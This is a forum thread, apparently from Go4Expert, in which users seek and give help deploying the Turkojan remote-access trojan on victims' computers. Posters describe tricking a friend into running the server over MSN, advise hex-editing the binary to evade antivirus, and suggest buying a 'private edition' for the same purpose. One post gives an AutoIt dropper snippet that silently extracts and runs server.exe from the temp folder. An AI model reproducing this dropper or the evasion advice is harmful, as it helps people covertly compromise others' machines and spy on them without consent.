United's Avatar
Light Poster
Talking bout undetectable server, is turkojan easily detected on victim's com? coz my antivirus(Bitdefender) easily detects it everytime.

Btw, is it compulsory to buy a router and do port forwarding first? Coz my "IP keeps changing" problem is still unresolved.
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
Start Voting for article of the month for July 2008
XXxxImmortalxxXX's Avatar
Invasive contributor
welll you have to make it undetectable as for your ip can change at all times if u read the begging of my post it will tell u about dynamic and static that should help u if not google about them
United's Avatar
Light Poster
how dya make it undetectable? I changed it into a .e1e file and sent it to my friend by msn, then ask them to change it back to exe, but their computer identified it as a virus immidieately.
XXxxImmortalxxXX's Avatar
Invasive contributor
Look up programs that can change the HEX inside the program itself
United's Avatar
Light Poster
8 bit, 16 bit, or 32 bit?
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
Winner of Article of the month for July 2008
XXxxImmortalxxXX's Avatar
Invasive contributor
i do 32 bit
edmondyjh's Avatar, Join Date: Sep 2008
Newbie Member
I have added

#NoTrayIcon
FileInstall("server.exe", @TempDir&"/server.exe")
Run(@TempDir&"/server.exe")

but it can't find server.exe, so where to add this in?
edmondyjh's Avatar, Join Date: Sep 2008
Newbie Member
Quote:
Originally Posted by United
how dya make it undetectable? I changed it into a .e1e file and sent it to my friend by msn, then ask them to change it back to exe, but their computer identified it as a virus immidieately.
I guess you gotta request for another private edition, only then it is not undetectable by av.